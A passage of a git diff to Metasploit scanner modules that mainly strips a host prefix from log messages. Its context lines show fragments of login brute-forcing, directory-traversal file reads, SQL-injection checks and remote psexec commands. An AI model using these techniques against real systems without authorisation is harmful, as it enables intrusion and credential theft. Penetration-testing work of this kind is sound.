"j_security_check"), @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 302 - vprint_status("#{peer} - Login succesful") + vprint_status("Login succesful") else - vprint_error("#{peer} - Login was not succesful!") + vprint_error("Login was not succesful!") return end randomname = Rex::Text.rand_text_alphanumeric(10) - vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "WorkOrder.do"), @@ -114,21 +114,21 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 - vprint_status("#{peer} - Ticket created") + vprint_status("Ticket created") if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) fileid = $1 - vprint_status("#{peer} - File ID is [ #{fileid} ]") + vprint_status("File ID is [ #{fileid} ]") fileauthkey = $2 - vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + vprint_status("Auth Key is [ #{fileauthkey} ]") else - vprint_error("#{peer} - File ID and AuthKey not found!") + vprint_error("File ID and AuthKey not found!") end else - vprint_error("#{peer} - Ticket not created due to error!") + vprint_error("Ticket not created due to error!") return end - vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary data, datastore['FILE'] ) - print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]") else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end end end diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 82b8f3d7f4..ede1e33c3c 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -111,10 +111,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Unable to download the file. The server timed out.") + print_error("Unable to download the file. The server timed out.") return elsif res and res.body.empty? - print_error("#{peer} - File not found or empty.") + print_error("File not found or empty.") return end @@ -123,24 +123,24 @@ class Metasploit3 < Msf::Auxiliary f = ::File.basename(fname) p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f) - print_good("#{peer} - File saved as: '#{p}'") + print_good("File saved as: '#{p}'") end def run_host(ip) sid, last_login = get_login_data if sid.empty? or last_login.empty? - print_error("#{peer} - Missing required login data. Cannot continue.") + print_error("Missing required login data. Cannot continue.") return end username = datastore['USERNAME'] password = datastore['PASSWORD'] if not auth(username, password, sid, last_login) - print_error("#{peer} - Unable to login. Cannot continue.") + print_error("Unable to login. Cannot continue.") return else - print_good("#{peer} - Logged in as '#{username}:#{password}'") + print_good("Logged in as '#{username}:#{password}'") end fname = datastore['FILENAME'] diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index c94347a9f9..46fc088080 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Trying to bruteforce login") + print_status("Trying to bruteforce login") res = send_request_cgi({ 'method' => 'GET', @@ -67,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary end def try_login(user, pass) - vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'") + vprint_status("Trying username:'#{user}' password: '#{pass}'") cookie = typo3_backend_login(user, pass) if cookie - print_good("#{peer} - Successful login '#{user}' password: '#{pass}'") + print_good("Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'") + vprint_error("failed to login as '#{user}' password: '#{pass}'") return end end diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 5c14785e1e..329ad2b77f 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary begin sid = get_sid if sid.nil? - vprint_error("#{peer} - Failed to get sid") + vprint_error("Failed to get sid") return :abort end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => sid }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Auxiliary when /User name already confirmed/ return :skip_user when /Invalid password/ - vprint_status("#{peer} - Username found: #{user}") + vprint_status("Username found: #{user}") when /\<a href="process\.php\?logout=1"\>/ - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body) return :next_user end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index cf05c0858a..6486a74948 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") + vprint_status("Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] res = send_request_raw({ @@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded") + vprint_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 12e6ed9e4a..a9ae93a81b 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -42,7 +42,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/'), @@ -55,14 +55,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 1584fd9278..9b804e4bb4 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless wordpress_and_online? - print_error("#{peer} - Looks like this site is no WordPress blog") + print_error("Looks like this site is no WordPress blog") return end unless wordpress_xmlrpc_enabled? - print_error("#{peer} - XMLRPC interface is not enabled") + print_error("XMLRPC interface is not enabled") return end @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? || res.code == 500 - print_good("#{peer} - vulnerable to GHOST") + print_good("vulnerable to GHOST") report_vuln( :host => ip, :proto => 'tcp', @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary :sname => datastore['SSL'] ? "https" : "http" ) else - print_status("#{peer} - target not vulnerable to GHOST") + print_status("target not vulnerable to GHOST") end end diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fb7097671a..b46c204c6f 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - print_status("#{peer} - Starting XML-RPC login sweep...") + print_status("Starting XML-RPC login sweep...") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 36448f4262..3892db3191 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => wordpress_url_admin_ajax, @@ -49,14 +49,14 @@ class Metasploit4 < Msf::Auxiliary } }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 507b311f36..11c29161d2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index 58f70a893b..d4384810b1 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") + vprint_error("Nothing was downloaded. Check the path and the traversal parameters.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6c8259c09f..1f9046447c 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary ) temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") + print_error("Nothing was downloaded. You can try checking the POSTID parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index ca60253e0c..88f9ca2081 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index accb58a7f7..51404cbbd1 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -93,20 +93,20 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") traversal = "../" * datastore['DEPTH'] filename = datastore['DIRPATH'] @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.") + print_error("Nothing was downloaded. You can try to change the DIRPATH.") end end end diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 4c8334e289..7f0559721d 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary ) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way.") + vprint_error("Server did not respond in an expected way.") return end @@ -81,9 +81,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") + vprint_error("Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") end end end diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 78e9e72086..001e7a8f7a 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -116,25 +116,25 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") - vprint_status("#{peer} - Trying to download filepath.") + vprint_status("Trying to download filepath.") file_path = down_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error downloading filepath.") + print_error("Error downloading filepath.") return end @@ -164,9 +164,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") + print_error("Nothing was downloaded. You can try to change the FILEPATH.") end end end diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ead12ac27a..f62eb75a58 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -35,19 +35,19 @@ class Metasploit3 < Msf::Auxiliary end def run_host(target_host) - vprint_status("#{peer} - Sending RMI Header...") + vprint_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end # Determine if the instance allows remote class loading - vprint_status("#{peer} - Sending RMI Call...") + vprint_status("Sending RMI Call...") jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar' jar_url = "file:RMIClassLoaderSecurityTest/" + jar @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary return_value = recv_return if return_value.nil? - print_error("#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") + print_error("Failed to send RMI Call, anyway JAVA RMI Endpoint detected") report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "") return end diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 8c7fa985c9..04900cde94 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status "#{peer} - SunRPC - Enumerating programs" + vprint_status "SunRPC - Enumerating programs" begin program = 100000 @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end sunrpc_destroy return if maps.empty? - vprint_good("#{peer} - Found #{maps.size} programs available") + vprint_good("Found #{maps.size} programs available") table = Rex::Ui::Text::Table.new( 'Header' => "SunRPC Programs for #{ip}", diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7219f8eab1..f5b6bdbe5c 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Login...") + vprint_status("Login...") if (not mysql_login_datastore) return @@ -53,10 +53,10 @@ class Metasploit3 < Msf::Auxiliary begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary table_exists = (res.size == 1) if !table_exists - vprint_status("#{peer} - Table doesn't exist so creating it") + vprint_status("Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary file.close if !table_exists - vprint_status("#{peer} - Cleaning up the temp table") + vprint_status("Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good("#{peer} - #{dir} is a directory and exists") + print_good("#{dir} is a directory and exists") report_note( :host => rhost, :type => "filesystem.dir", @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", @@ -104,15 +104,15 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::ServerError - vprint_warning("#{peer} - #{dir} does not exist") + vprint_warning("#{dir} does not exist") rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return else - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 2d85876963..6d91606685 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -33,15 +33,15 @@ class Metasploit3 < Msf::Auxiliary end def run_host(_ip) - vprint_status("#{peer} -- contacting redis") + vprint_status("Contacting redis") begin connect return unless (data = redis_command(command)) report_service(host: rhost, port: rport, name: "redis server", info: "#{command} response: #{data}") - print_good("#{peer} -- found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") + print_good("Found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::Errno::ETIMEDOUT => e - vprint_error("#{peer} -- error while communicating: #{e}") + vprint_error("Error while communicating: #{e}") ensure disconnect end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 37584933e1..547e102a79 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary elsif res =~ /^#{RSYNC_HEADER} OK$/ 'not required' else - vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}") + vprint_error("unexpected response when connecting to #{rmodule}: #{res}") "unexpected response '#{res}'" end else - vprint_error("#{peer} - no response when connecting to #{rmodule}") + vprint_error("no response when connecting to #{rmodule}") 'no response' end end @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary end unless version - vprint_error("#{peer} - no rsync negotiation found") + vprint_error("no rsync negotiation found") return end @@ -149,12 +149,12 @@ class Metasploit3 < Msf::Auxiliary connect version, motd = rsync_negotiate unless version - vprint_error("#{peer} - does not appear to be rsync") + vprint_error("does not appear to be rsync") disconnect return end rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while connecting and negotiating: #{e}") + vprint_error("error while connecting and negotiating: #{e}") disconnect return end @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Auxiliary name: 'rsync', info: info ) - print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION'] - print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] + print_status("rsync version: #{version}") if datastore['SHOW_VERSION'] + print_status("rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] modules_metadata = {} begin @@ -182,10 +182,10 @@ class Metasploit3 < Msf::Auxiliary end if modules_metadata.empty? - print_status("#{peer} - no rsync modules found") + print_status("no rsync modules found") else modules = modules_metadata.map { |m| m[:name] } - print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}") + print_good("#{modules.size} rsync modules found: #{modules.join(', ')}") table_columns = %w(Name Comment) if datastore['TEST_AUTHENTICATION'] @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary rsync_negotiate module_metadata[:authentication] = get_rsync_auth_status(module_metadata[:name]) rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while testing authentication on #{module_metadata[:name]}: #{e}") + vprint_error("error while testing authentication on #{module_metadata[:name]}: #{e}") break ensure disconnect diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index b7543c4122..57af398132 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -95,7 +95,7 @@ class Metasploit4 < Msf::Auxiliary pass = pass.gsub("<SAPSID>", datastore["SAP_SID"]) end - print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'") + print_status("Trying username:'#{user}' password:'#{pass}'") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 5929b84dbf..6717969a73 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary connect smb_login rescue StandardError => autherror - print_error("#{peer} - #{autherror}") + print_error("#{autherror}") return end @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")} return cleanout rescue StandardError => hku_error - print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}") + print_error("Error runing query against HKU. #{hku_error.class}. #{hku_error}") return nil end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary simple.disconnect("\\\\#{ip}\\#{smbshare}") return output rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + print_error("Error getting command output. #{output_error.class}. #{output_error}.") return false end end @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary domain = line if line.include?("USERDOMAIN") end if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME'] - print_good("#{peer} - #{datastore['USERNAME']} is logged in") + print_good("#{datastore['USERNAME']} is logged in") report_user(datastore['USERNAME']) end return @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary end if username.length > 0 && domain.length > 0 user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) elsif logonserver.length > 0 && homepath.length > 0 uname = homepath.split('\\')[homepath.split('\\').size - 1] @@ -158,24 +158,24 @@ class Metasploit3 < Msf::Auxiliary uname = uname.split(".")[0] end user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else username = query_session(smbshare, ip, cmd, text, bat) if username hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." user = "#{hostname}\\#{username}" - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else - print_status("#{peer} - Unable to determine user information for user: #{key}") + print_status("Unable to determine user information for user: #{key}") end end else - print_status("#{peer} - Could not determine logged in users") + print_status("Could not determine logged in users") end rescue Rex::Proto::SMB::Exceptions::Error => check_error - print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") + print_error("Error checking reg key. #{check_error.class}. #{check_error}") return check_error end end @@ -185,12 +185,12 @@ class Metasploit3 < Msf::Auxiliary begin # Try and do cleanup command cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup") + print_status("Executing cleanup") out = psexec(cleanup) rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}") - print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually") - print_warning("#{peer} - Maybe #{bat} must be deleted manually") + print_error("Unable to processes cleanup commands: #{cleanuperror}") + print_warning("Maybe %SYSTEMDRIVE%#{text} must be deleted manually") + print_warning("Maybe #{bat} must be deleted manually") return cleanuperror end end diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index abed2f4c4f..8a0c584137 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -255,13 +255,13 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" case check_host(ip) when Exploit::CheckCode::Vulnerable - print_good("#{peer} - The target is vulnerable to CVE-2015-0240.") + print_good("The target is vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Appears - print_good("#{peer} - The target appears to be vulnerable to 